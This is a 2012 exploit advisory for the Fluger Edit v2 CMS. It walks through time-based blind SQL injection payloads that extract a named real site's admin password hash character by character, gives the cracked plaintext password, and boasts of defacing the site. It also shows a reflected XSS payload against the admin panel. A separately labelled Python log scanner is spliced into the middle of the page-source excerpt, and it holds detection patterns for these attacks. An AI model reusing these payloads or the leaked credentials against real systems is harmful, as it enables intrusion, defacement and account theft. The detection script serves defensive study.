Fluger Edit 2 Blind SQL Injection / Cross Site Scripting

Date: 02 Sep 2012 00:00:00 | Reported by: Akastep | Type: packetstorm | Source: packetstormsecurity.com

Fluger Edit v.2 Blind SQL Injection / Cross Site Scripting, Website: http://www.fluger.com/, Vulnerabilities: Blind SQL Injection And XSS, Exposed CMS and Admin panel, Real Exploitation examples, Vulnerable scenario at http://www.artclima.am/edit/config_secure/verify.php, Time Based RuleZ! www.artclima.am/edit/index.php?error, Example of Bypassing login for

Code
=====================================================
Vulnerable Software: Fluger Edit v.2 || administration software  
Vendor: http://www.fluger.com/  
Software License: Commercial  
Vulnerabilities: Blind SQL Injection And XSS  
Tested: In Wild  
=====================================================  
  
  
Dork :  
Designed and developed by Fluger IT  
All right reserved © | 2004 - 2012  
  
************** FOR OUR BRO RAMIL SEFEROV! ************************  
@OPERATION BY AZERBAIJAN BLACK HATZ: *WIPEN'EM purgens!*  
I'M=> AkaStep<= RESPONSIBLE FOR EVERYTHING IN THIS advisory=  
********************** REALLY! ********************************************  
******************ENJOY MAXIMALLY**************************************  
  
  
======================================================  
FULLY disclosed Real Exploitation examples:
GPC (magic_quotes_gpc) MUST BE OFF
  
There is a Blind SQLi vulnerability on the login page:
  
http://www.artclima.am/edit/ <===(Admin panel)  
  
  
The vulnerable scenario exists here: http://www.artclima.am/edit/config_secure/verify.php
  
(Sorry, I have no access to the source code)
  
CMS looks like: http://s61.radikal.ru/i172/1209/29/bb88e6891edf.png  
  
Due to the authentication mechanism you can't bypass the login form by sending:
'or''='

Instead, you can use the time-based way to obtain login:password from the admin table.
Here we go:  
  
Print screens: http://s010.radikal.ru/i314/1209/32/9dae8ab77a3d.png  
  
  
  
  
http://www.artclima.am/edit/index.php?error  
  
  
Headers:  
  
Host: www.artclima.am  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: keep-alive  
Cookie: PHPSESSID=:$  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 28  
  
  
  
POST DATA:  
  
username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
  
*REPLAY*  
  
  
There is a blind injection in the login.
Bypass does not work.
  
Time Based RuleZ!  
  
www.artclima.am/edit/index.php?error  
  
columns:
  
user  
password  
  
  
table: admin  
  
  
  
  
=========================================  
  
There is 1 user:
  
//TRUE  
username=' or (select if(count(*)='1',sleep(30),0) from admin)-- and 5='5&password=sikdir  
  
let's pull the login:
  
  
login: admin  
  
  
//TRUE  
  
username=' or (select if(user='admin',sleep(30),0) from admin)-- and 5='5&password=sikdir  
  
  
  
let's pull the password:
  
  
=========================================
1st character: e

username=' or (select if(substr(password,1,1)='e',sleep(30),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
2nd character: 0

username=' or (select if(substr(password,2,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
3rd character: 4

username=' or (select if(substr(password,3,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
4th character: 4

username=' or (select if(substr(password,4,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
5th character: 6

username=' or (select if(substr(password,5,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
6th character: 5

username=' or (select if(substr(password,6,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
7th character: 0

username=' or (select if(substr(password,7,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
8th character: a

username=' or (select if(substr(password,8,1)='a',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
9th character: 5

username=' or (select if(substr(password,9,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
10th character: 6

username=' or (select if(substr(password,10,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
11th character: 7

username=' or (select if(substr(password,11,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
12th character: e

username=' or (select if(substr(password,12,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
13th character: d

username=' or (select if(substr(password,13,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

(check later)

=========================================
14th character: 2

username=' or (select if(substr(password,14,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
15th character: b

username=' or (select if(substr(password,15,1)='b',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
16th character: 2

username=' or (select if(substr(password,16,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
17th character: d

username=' or (select if(substr(password,17,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
18th character: 0

username=' or (select if(substr(password,18,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
19th character: 4

username=' or (select if(substr(password,19,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
20th character: 3

username=' or (select if(substr(password,20,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
21st character: 0

username=' or (select if(substr(password,21,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
22nd character: 3

username=' or (select if(substr(password,22,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
23rd character: e

username=' or (select if(substr(password,23,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
24th character: 3

username=' or (select if(substr(password,24,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
25th character: 7

username=' or (select if(substr(password,25,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
26th character: 9

username=' or (select if(substr(password,26,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
27th character: 3

username=' or (select if(substr(password,27,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
28th character: d

username=' or (select if(substr(password,28,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
29th character: f

username=' or (select if(substr(password,29,1)='f',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
30th character: d

username=' or (select if(substr(password,30,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
31st character: 9

username=' or (select if(substr(password,31,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
32nd character: 5

username=' or (select if(substr(password,32,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
  
  
Verification: +  
  
  
//TRUE  
username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
MD5: e044650a567ed2b2d04303e3793dfd95  
  
Resolves to: price777  
  
Sure! I will "rm"-it too with great pleasure!  
  
Rmned: http://zone-h.org/mirror/id/18295382  
  
  
  
  
  
Second way: session hijack to gain access to the admin panel:
  
XSS:  
http://www.artclima.am/edit/admin.php?page=news_admin/news&type=25&type_name=Title%20Ptoduct%3Cscript%3Ealert%28%22OwnEd%20By%20AkaStep%22%29;%3C/script%3E&type_admin=Catalog&empty_sess=1  
  
  
Print Screen:  
http://s61.radikal.ru/i173/1209/26/8f9f482ff32d.png  
  
  
  
  
  
From the page's source code:
  
  
  
  
<table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="h350">  
<tr valign="top">  
<td class="bg_content">  
<div id="printarea">  
<table cellpadding="0" cellspacing="0" border="0" summary="" style="height: 24px;" width="100%" class="tabfree">  
<tr>  
<td class="tabcurrent">Title Ptoduct<script>alert("OwnEd By AkaStep");</script></td>  
<td>&nbsp;</td>  
</tr>  
</table>  
<table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="boxborder" >  
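As an added defender-side example (not part of the advisory), the following Python script scans constructed web-server log lines for the two attack patterns described above: repeated slow POSTs to the login handler, which is the footprint a sleep()-based blind extraction leaves even when request bodies are not logged, and script tags in the query string of admin.php. The log format, the sample lines and IPs, and the 10-second threshold are assumptions made for this example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access log (not taken from the advisory): combined format with the
# request duration in seconds appended as a last field (nginx $request_time style).
SAMPLE_LOG = """\
203.0.113.5 - - [02/Sep/2012:10:00:01 +0400] "POST /edit/config_secure/verify.php HTTP/1.1" 302 0 60.02
203.0.113.5 - - [02/Sep/2012:10:01:03 +0400] "POST /edit/config_secure/verify.php HTTP/1.1" 302 0 0.04
203.0.113.5 - - [02/Sep/2012:10:01:05 +0400] "POST /edit/config_secure/verify.php HTTP/1.1" 302 0 60.01
203.0.113.5 - - [02/Sep/2012:10:02:07 +0400] "GET /edit/admin.php?page=news_admin/news&type_name=Title%3Cscript%3Ealert%281%29%3C/script%3E HTTP/1.1" 200 5120 0.03
198.51.100.7 - - [02/Sep/2012:10:02:09 +0400] "POST /edit/config_secure/verify.php HTTP/1.1" 302 0 0.05
198.51.100.7 - - [02/Sep/2012:10:02:11 +0400] "GET /edit/index.php?error HTTP/1.1" 200 2048 0.02
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) (?P<secs>\d+(?:\.\d+)?)$')
LOGIN_PATH = "/edit/config_secure/verify.php"  # login handler named in the advisory
# Markers for the two injection classes shown in the advisory, matched on the decoded URL.
SQLI_RE = re.compile(r"sleep\s*\(|benchmark\s*\(|substr\s*\(\s*password", re.I)
XSS_RE = re.compile(r"<\s*script|javascript:", re.I)

def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["secs"] = float(rec["secs"])
    rec["decoded"] = unquote_plus(rec["target"])
    return rec

def analyze(log_text, slow_seconds=10.0, min_slow_hits=2):
    """Flag (a) repeated slow login POSTs per source IP, the shape of a sleep()-based
    extraction when POST bodies are not logged, and (b) injection markers in URLs."""
    slow_logins = Counter()
    marker_hits = []
    for rec in filter(None, map(parse_line, log_text.splitlines())):
        if rec["method"] == "POST" and rec["target"] == LOGIN_PATH and rec["secs"] >= slow_seconds:
            slow_logins[rec["ip"]] += 1
        for kind, pattern in (("sqli", SQLI_RE), ("xss", XSS_RE)):
            if pattern.search(rec["decoded"]):
                marker_hits.append((rec["ip"], kind, rec["decoded"]))
    alerts = [f"{ip}: {n} login POSTs took >= {slow_seconds:g}s (time-based blind SQLi?)"
              for ip, n in slow_logins.items() if n >= min_slow_hits]
    alerts += [f"{ip}: {kind} marker in {path}" for ip, kind, path in marker_hits]
    return {"slow_logins": dict(slow_logins), "marker_hits": marker_hits, "alerts": alerts}
```

Running `analyze(SAMPLE_LOG)["alerts"]` on the sample yields one slow-login alert for 203.0.113.5 and one XSS-marker alert; the SQLI_RE pattern only fires on GET query strings, so for a login form the duration signal is the one to rely on.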
  
  
  
==========================THE END=========================  
  
  
  
  
  
  
SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:  
===========================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
exploit-db.com  
to all AA Team + to all Azerbaijan Black HatZ +  
*Especially to my bro CAMOUFL4G3.*  
===========================================================  
  
/AkaStep  
  
  
02.09.2012  
  
  
  
  
  
